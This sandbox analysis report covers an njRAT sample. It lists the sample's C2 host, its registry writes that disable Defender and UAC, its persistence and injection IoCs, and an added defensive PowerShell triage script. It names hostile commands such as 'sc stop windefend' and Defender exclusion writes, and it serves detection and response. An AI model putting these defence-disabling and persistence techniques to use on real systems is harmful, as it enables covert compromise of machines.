Analysis
max time kernel: 149s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20231215-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
submitted: 27/01/2024, 05:47

Static task: static1
Behavioral task behavioral1: sample 796ed4b0db9b3d50149b39c35c97fb22.exe, resource win7-20231215-en
Behavioral task behavioral2: sample 796ed4b0db9b3d50149b39c35c97fb22.exe, resource win10v2004-20231215-en (the run reported below)
General
Target: 796ed4b0db9b3d50149b39c35c97fb22.exe
Size: 2.8MB
MD5: 796ed4b0db9b3d50149b39c35c97fb22
SHA1: 154fde51c43d3a8b8f1b96df04f3e97fe4c922a6
SHA256: 37db478cd1a50883e179c601987b3a5171823aaa9d04063817fa7af57723ffb7
SHA512: 762989d2993cc2431b50ae9a2847cc3b16bce41c15da9a974dd90c66884ac28b32698edbf9d13b948d7b1f22919278b43e4448710dda2b2489b509bd6ecf00c7
SSDEEP: 1536:qfoDCSHH6dNPdeGb0kMzA1UYaER0XBi3IGd0b15grKsYmhUeogKGiGDaLm8G/BaI:O
Malware Config
Extracted
Family: njrat
Version: 0.7.3
Botnet: Client
C2: dontreachme3.ddns.net:3604
Install name: EdgeBrowser.exe
reg_key: EdgeBrowser.exe
splitter: 123

The C2 is a dynamic-DNS hostname, so the address it resolves to will change over time; block or alert on the hostname and port rather than on a single IP. The install name matches the file the sample drops as C:\Windows\EdgeBrowser.exe in the process tree below.
Signatures

Modifies Windows Defender Real-time Protection settings 4 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | 796ed4b0db9b3d50149b39c35c97fb22.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | 796ed4b0db9b3d50149b39c35c97fb22.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | 796ed4b0db9b3d50149b39c35c97fb22.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | 796ed4b0db9b3d50149b39c35c97fb22.exe
The writes land under WOW6432Node because the sample is a 32-bit process; the 64-bit Defender service reads the native policy key (HKLM\SOFTWARE\Policies\Microsoft\Windows Defender), so check both views when triaging a host.

Turns off Windows Defender SpyNet reporting 2 TTPs

UAC bypass 5 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | EdgeBrowser.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | 796ed4b0db9b3d50149b39c35c97fb22.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | EdgeBrowser.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | EdgeBrowser.exe
EnableLUA = 0 switches UAC off entirely, but only after the next reboot; the same five writes are listed again under System policy modification.

Windows security bypass 5 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | 796ed4b0db9b3d50149b39c35c97fb22.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe = "0" | 796ed4b0db9b3d50149b39c35c97fb22.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe = "0" | 796ed4b0db9b3d50149b39c35c97fb22.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe = "0" | 796ed4b0db9b3d50149b39c35c97fb22.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\EdgeBrowser.exe = "0" | EdgeBrowser.exe
Defender stores a path exclusion as a value named after the path with data 0, so the "0" carries no meaning. These rows are direct registry writes by the sample itself; the process tree shows three of the same paths (the Temp sample, the Startup copy and the Common Files svchost.exe) being added again through powershell.exe Add-MpPreference -ExclusionPath.
Nirsoft 1 IoCs
resource | yara_rule
behavioral2/files/0x00090000000231e9-14.dat | Nirsoft
AdvancedRun.exe, launched from the sample's Temp directory in the process tree, is a NirSoft utility.

Stops running service(s) 3 TTPs
Checks computer location settings 2 TTPs 7 IoCs
Looks up the country code configured in the registry, likely a geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation | EdgeBrowser.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation | 796ed4b0db9b3d50149b39c35c97fb22.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation | AdvancedRun.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation | 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation | 796ed4b0db9b3d50149b39c35c97fb22.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation | EdgeBrowser.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation | EdgeBrowser.exe

Drops startup file 2 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe | 796ed4b0db9b3d50149b39c35c97fb22.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe | 796ed4b0db9b3d50149b39c35c97fb22.exe
Executes dropped EXE 15 IoCs
pid | Process
5100 | AdvancedRun.exe
2756 | AdvancedRun.exe
868 | 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe
1004 | AdvancedRun.exe
3324 | 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe
3864 | EdgeBrowser.exe
4676 | AdvancedRun.exe
3460 | EdgeBrowser.exe
3652 | EdgeBrowser.exe
2716 | AdvancedRun.exe
2776 | EdgeBrowser.exe
2896 | EdgeBrowser.exe
4380 | EdgeBrowser.exe
1376 | AdvancedRun.exe
5504 | EdgeBrowser.exe

Windows security modification 13 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions | 796ed4b0db9b3d50149b39c35c97fb22.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\EdgeBrowser.exe = "0" | EdgeBrowser.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection | 796ed4b0db9b3d50149b39c35c97fb22.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | 796ed4b0db9b3d50149b39c35c97fb22.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" | 796ed4b0db9b3d50149b39c35c97fb22.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | 796ed4b0db9b3d50149b39c35c97fb22.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe = "0" | 796ed4b0db9b3d50149b39c35c97fb22.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe = "0" | 796ed4b0db9b3d50149b39c35c97fb22.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | 796ed4b0db9b3d50149b39c35c97fb22.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe = "0" | 796ed4b0db9b3d50149b39c35c97fb22.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet | 796ed4b0db9b3d50149b39c35c97fb22.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" | 796ed4b0db9b3d50149b39c35c97fb22.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | 796ed4b0db9b3d50149b39c35c97fb22.exe
When Tamper Protection is on it blocks registry edits to its own settings from non-Microsoft processes, so the TamperProtection = 0 write only takes effect on a host where it was already off; treat these rows as indicators of the family's setup routine rather than proof that Defender was disabled.

Adds Run key to start application 2 TTPs 5 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7 = "C:\\Program Files\\Common Files\\System\\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\\svchost.exe" | 796ed4b0db9b3d50149b39c35c97fb22.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7 = "C:\\Program Files\\Common Files\\System\\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\\svchost.exe" | 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7 = "C:\\Program Files\\Common Files\\System\\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\\svchost.exe" | EdgeBrowser.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7 = "C:\\Program Files\\Common Files\\System\\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\\svchost.exe" | EdgeBrowser.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7 = "C:\\Program Files\\Common Files\\System\\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\\svchost.exe" | EdgeBrowser.exe
The target is a dropped file named svchost.exe under Common Files, not the system binary in System32. A RunOnce value is deleted when Windows consumes it at logon; every instance of the sample rewrites it, which is how the entry survives.

Checks whether UAC is enabled 10 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | EdgeBrowser.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | EdgeBrowser.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | EdgeBrowser.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | 796ed4b0db9b3d50149b39c35c97fb22.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | EdgeBrowser.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | EdgeBrowser.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | EdgeBrowser.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 796ed4b0db9b3d50149b39c35c97fb22.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 61 IoCs
pid | Process | calls
2320 | 796ed4b0db9b3d50149b39c35c97fb22.exe | 13
868 | 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe | 12
3864 | EdgeBrowser.exe | 12
3652 | EdgeBrowser.exe | 12
4380 | EdgeBrowser.exe | 12
The same five processes are the injecting parents in the next table, so the ThreadHideFromDebugger calls belong to the loader stage rather than to the injected payload.

Suspicious use of SetThreadContext 5 IoCs
description | pid | Process | procid_target
PID 2320 set thread context of 5432 | 2320 | 796ed4b0db9b3d50149b39c35c97fb22.exe | 134
PID 868 set thread context of 3324 | 868 | 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe | 146
PID 3864 set thread context of 3460 | 3864 | EdgeBrowser.exe | 192
PID 3652 set thread context of 2896 | 3652 | EdgeBrowser.exe | 239
PID 4380 set thread context of 5504 | 4380 | EdgeBrowser.exe | 285
In each row the parent sets the thread context of a child it has just created and written to (the WriteProcessMemory table shows 2320 writing into 5432 five times), which is the sequence a RunPE-style loader uses to replace a suspended child's image before resuming it. The Program crash table shows the same five parents reporting to WerFault afterwards.
Drops file in Program Files directory 1 IoCs
description | ioc | Process
File created | C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe | 796ed4b0db9b3d50149b39c35c97fb22.exe

Drops file in Windows directory 2 IoCs
description | ioc | Process
File created | C:\Windows\EdgeBrowser.exe | 796ed4b0db9b3d50149b39c35c97fb22.exe
File opened for modification | C:\Windows\EdgeBrowser.exe | EdgeBrowser.exe
Writing to C:\Windows and C:\Program Files requires administrative rights, so the sample was already running elevated in this environment.

Launches sc.exe 64 IoCs
sc.exe is the Windows utility that controls services on the system.
pid (Process is sc.exe in every row)
3744 2428 5316 1660 5452 2324 3508 4660
4660 3712 564 884 3616 3816 6052 5960
2148 3744 1364 5804 4692 4424 1752 3764
4752 4884 4896 3196 3408 4160 2156 4000
1424 1212 2268 3364 756 3652 1912 2944
6052 1500 928 4160 4424 4796 1800 2804
4884 4160 2428 3512 2268 1212 3196 3108
5304 1760 4448 4736 3860 704 3688 4484
Only one of these command lines, sc stop windefend (PID 5452, run from the dropped test.bat), survives in the process tree below.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Program crash 5 IoCs
pid | pid_target | Process | procid_target
5836 | 2320 | WerFault.exe | 85
5488 | 868 | WerFault.exe | 106
1436 | 3864 | WerFault.exe | 152
5428 | 3652 | WerFault.exe | 199
2128 | 4380 | WerFault.exe | 246
pid_target is the crashing process; all five are the parents from the SetThreadContext table.

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
812 | schtasks.exe
5492 | schtasks.exe
5864 | schtasks.exe
5460 | schtasks.exe
2972 | schtasks.exe

Delays execution with timeout.exe 5 IoCs
pid | Process
5752 | timeout.exe
2128 | timeout.exe
3324 | timeout.exe
5748 | timeout.exe
5752 | timeout.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process | occurrences
5100 | AdvancedRun.exe | 4
2756 | AdvancedRun.exe | 4
2896 | powershell.exe | 4
1376 | powershell.exe | 4
3616 | sc.exe | 3
4440 | powershell.exe | 3
1080 | powershell.exe | 3
1360 | powershell.exe | 3
552 | powershell.exe | 3
320 | powershell.exe | 3
1004 | AdvancedRun.exe | 4
5844 | powershell.exe | 3
5884 | powershell.exe | 3
5928 | powershell.exe | 3
2320 | 796ed4b0db9b3d50149b39c35c97fb22.exe | 4
5996 | powershell.exe | 3
6088 | powershell.exe | 3
868 | 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe | 3
4676 | AdvancedRun.exe | 4
Suspicious use of AdjustPrivilegeToken 64 IoCs
pid | Process | Token(s)
5100 | AdvancedRun.exe | SeDebugPrivilege, SeImpersonatePrivilege
2756 | AdvancedRun.exe | SeDebugPrivilege, SeImpersonatePrivilege
2896 | powershell.exe | SeDebugPrivilege
1376 | powershell.exe | SeDebugPrivilege
3616 | sc.exe | SeDebugPrivilege
4440 | powershell.exe | SeDebugPrivilege
1080 | powershell.exe | SeDebugPrivilege
1360 | powershell.exe | SeDebugPrivilege
552 | powershell.exe | SeDebugPrivilege
320 | powershell.exe | SeDebugPrivilege
1004 | AdvancedRun.exe | SeDebugPrivilege, SeImpersonatePrivilege
5844 | powershell.exe | SeDebugPrivilege
5884 | powershell.exe | SeDebugPrivilege
5928 | powershell.exe | SeDebugPrivilege
2320 | 796ed4b0db9b3d50149b39c35c97fb22.exe | SeDebugPrivilege
5996 | powershell.exe | SeDebugPrivilege
6088 | powershell.exe | SeDebugPrivilege
868 | 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe | SeDebugPrivilege
4676 | AdvancedRun.exe | SeDebugPrivilege, SeImpersonatePrivilege
1580 | powershell.exe | SeDebugPrivilege
2508 | powershell.exe | SeDebugPrivilege
3456 | powershell.exe | SeDebugPrivilege
4316 | powershell.exe | SeDebugPrivilege
1240 | powershell.exe | SeDebugPrivilege
3864 | EdgeBrowser.exe | SeDebugPrivilege
3460 | EdgeBrowser.exe | SeDebugPrivilege, then the pair 33 + SeIncBasePriorityPrivilege ten times, interleaved with the rows below
2716 | AdvancedRun.exe | SeDebugPrivilege, SeImpersonatePrivilege
5212 | powershell.exe | SeDebugPrivilege
5572 | powershell.exe | SeDebugPrivilege
3016 | powershell.exe | SeDebugPrivilege
6072 | powershell.exe | SeDebugPrivilege
4972 | powershell.exe | SeDebugPrivilege
3652 | EdgeBrowser.exe | SeDebugPrivilege
1376 | AdvancedRun.exe | SeDebugPrivilege, SeImpersonatePrivilege
5300 | powershell.exe | SeDebugPrivilege
5408 | powershell.exe | SeDebugPrivilege
1504 | powershell.exe | SeDebugPrivilege
5700 | powershell.exe | SeDebugPrivilege
SeDebugPrivilege on the sample and its copies is what the cross-process writes and SetThreadContext calls above require; the report leaves privilege 33 unnamed. PID 1376 appears as both powershell.exe and AdvancedRun.exe because the PID was reused during the run.
Suspicious use of WriteProcessMemory 64 IoCs
source pid | target pid | source Process | procid_target | writes
2320 | 5100 | 796ed4b0db9b3d50149b39c35c97fb22.exe | 89 | 3
5100 | 2756 | AdvancedRun.exe | 90 | 3
2320 | 2896 | 796ed4b0db9b3d50149b39c35c97fb22.exe | 96 | 3
2320 | 1376 | 796ed4b0db9b3d50149b39c35c97fb22.exe | 98 | 3
2320 | 4440 | 796ed4b0db9b3d50149b39c35c97fb22.exe | 100 | 3
2320 | 3616 | 796ed4b0db9b3d50149b39c35c97fb22.exe | 162 | 3
2320 | 1080 | 796ed4b0db9b3d50149b39c35c97fb22.exe | 104 | 3
2320 | 868 | 796ed4b0db9b3d50149b39c35c97fb22.exe | 106 | 3
2320 | 1360 | 796ed4b0db9b3d50149b39c35c97fb22.exe | 107 | 3
2320 | 552 | 796ed4b0db9b3d50149b39c35c97fb22.exe | 112 | 3
2320 | 320 | 796ed4b0db9b3d50149b39c35c97fb22.exe | 110 | 3
868 | 1004 | 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe | 113 | 3
2320 | 2404 | 796ed4b0db9b3d50149b39c35c97fb22.exe | 118 | 3
4984 | 5452 | cmd.exe | 121 | 2
2404 | 5748 | cmd.exe | 123 | 3
868 | 5844 | 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe | 124 | 3
868 | 5884 | 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe | 126 | 3
868 | 5928 | 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe | 129 | 3
868 | 5996 | 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe | 130 | 3
868 | 6088 | 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe | 132 | 3
2320 | 5432 | 796ed4b0db9b3d50149b39c35c97fb22.exe | 134 | 5
Most children receive exactly three writes at creation; 5432, the process whose thread context 2320 sets in the SetThreadContext table, receives five.
System policy modification 1 TTPs 5 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | EdgeBrowser.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | EdgeBrowser.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | 796ed4b0db9b3d50149b39c35c97fb22.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | EdgeBrowser.exe
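The registry, file and task artifacts above are what a responder needs to look for on a suspect host. The script below is an added host-triage example, not part of the Triage report or of any tool the report mentions: it checks each artifact class the Signatures section lists and prints what it finds. It assumes an elevated 64-bit PowerShell session on the host being examined. The random directory and file names seen in this run (8ba77dff-..., ccfP9b0f..., 4cJUfE9X...) are per-build, so the checks match on location and shape rather than on those literal names; only EdgeBrowser.exe and the task name NYAN are taken as fixed.

```powershell
# Added host-triage script (not from the sandbox report). Run elevated, 64-bit.
$ErrorActionPreference = 'SilentlyContinue'
$findings = New-Object System.Collections.Generic.List[string]

# 1. Real-Time Protection policy values the sample sets to 1. The report shows them
#    under WOW6432Node; the 64-bit Defender service reads the native view, so check
#    both and treat a WOW6432Node-only hit as an indicator (section 3 asks the service).
$rtpValues = 'DisableRealtimeMonitoring', 'DisableBehaviorMonitoring',
             'DisableOnAccessProtection', 'DisableScanOnRealtimeEnable'
foreach ($k in 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection',
               'HKLM:\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection') {
    $p = Get-ItemProperty -Path $k
    foreach ($v in $rtpValues) {
        if ($p.$v -eq 1) { $findings.Add("RTP policy $v = 1 under $k") }
    }
}

# 2. Feature/reporting toggles and path exclusions written straight into the registry.
foreach ($root in 'HKLM:\SOFTWARE\Microsoft\Windows Defender',
                  'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows Defender') {
    $f = Get-ItemProperty -Path "$root\Features"
    if ($f.TamperProtection -eq 0) { $findings.Add("TamperProtection = 0 under $root\Features") }
    $s = Get-ItemProperty -Path "$root\Spynet"
    if ($s.SpyNetReporting -eq 0 -or $s.SubmitSamplesConsent -eq 0) {
        $findings.Add("SpyNet reporting or sample submission disabled under $root\Spynet")
    }
    $ex = Get-Item -Path "$root\Exclusions\Paths"
    if ($ex) { foreach ($name in $ex.GetValueNames()) { $findings.Add("Path exclusion (registry): $name") } }
}

# 3. The Defender service's own view, which is what actually governs scanning.
$mp = Get-MpPreference
foreach ($e in $mp.ExclusionPath) { $findings.Add("Path exclusion (Get-MpPreference): $e") }
if ($mp.DisableRealtimeMonitoring) { $findings.Add('Get-MpPreference: DisableRealtimeMonitoring is true') }
$svc = Get-Service -Name WinDefend
if ($svc -and $svc.Status -ne 'Running') { $findings.Add("WinDefend service is $($svc.Status); test.bat ran 'sc stop windefend'") }

# 4. UAC policy. EnableLUA = 0 only applies after a reboot, so the host may still prompt today.
$sys = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
if ($sys.EnableLUA -eq 0) { $findings.Add('EnableLUA = 0 (UAC off after next reboot)') }

# 5. Persistence: Startup-folder executable, RunOnce pointing at an svchost.exe outside
#    System32, a copy under Common Files\System, C:\Windows\EdgeBrowser.exe, and task NYAN.
Get-ChildItem -Path ([Environment]::GetFolderPath('Startup')) -Filter '*.exe' |
    ForEach-Object { $findings.Add("Executable in Startup folder: $($_.FullName)") }
$runOnce = Get-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
if ($runOnce) {
    foreach ($prop in $runOnce.PSObject.Properties) {
        if ($prop.Value -is [string] -and $prop.Value -match 'svchost\.exe' -and $prop.Value -notmatch '\\System32\\') {
            $findings.Add("RunOnce '$($prop.Name)' -> $($prop.Value)")
        }
    }
}
Get-ChildItem -Path "$env:CommonProgramFiles\System" -Directory |
    ForEach-Object { $c = Join-Path $_.FullName 'svchost.exe'; if (Test-Path $c) { $findings.Add("svchost.exe under Common Files: $c") } }
if (Test-Path 'C:\Windows\EdgeBrowser.exe') { $findings.Add('C:\Windows\EdgeBrowser.exe present') }
$task = Get-ScheduledTask -TaskName 'NYAN'
if ($task) { $findings.Add("Scheduled task NYAN runs $($task.Actions[0].Execute)") }

if ($findings.Count -eq 0) { 'No artifacts from this report found.' } else { $findings }
```

Sections 2 and 3 deliberately overlap: a path that shows up in the registry but not in Get-MpPreference (or the reverse) tells you whether the sample's direct writes were honoured by the service. Remediation is the inverse of each finding (Remove-MpPreference -ExclusionPath, Set-MpPreference -DisableRealtimeMonitoring $false, Unregister-ScheduledTask -TaskName NYAN, resetting EnableLUA to 1 and starting WinDefend), but do it only after the dropped executables and the injected processes from the SetThreadContext table have been stopped, since every running copy rewrites the RunOnce value and the task.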
Processes
Each entry gives the image path, the command line as executed, the signatures the process triggered and its PID; indentation shows parent and child. For the 32-bit processes the command line names C:\Windows\System32 while the image path is C:\Windows\SysWOW64, which is ordinary file-system redirection, not tampering.

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
  "C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"
  - Modifies Windows Defender Real-time Protection settings
  - UAC bypass
  - Windows security bypass
  - Checks computer location settings
  - Drops startup file
  - Windows security modification
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID: 2320

    C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 5100
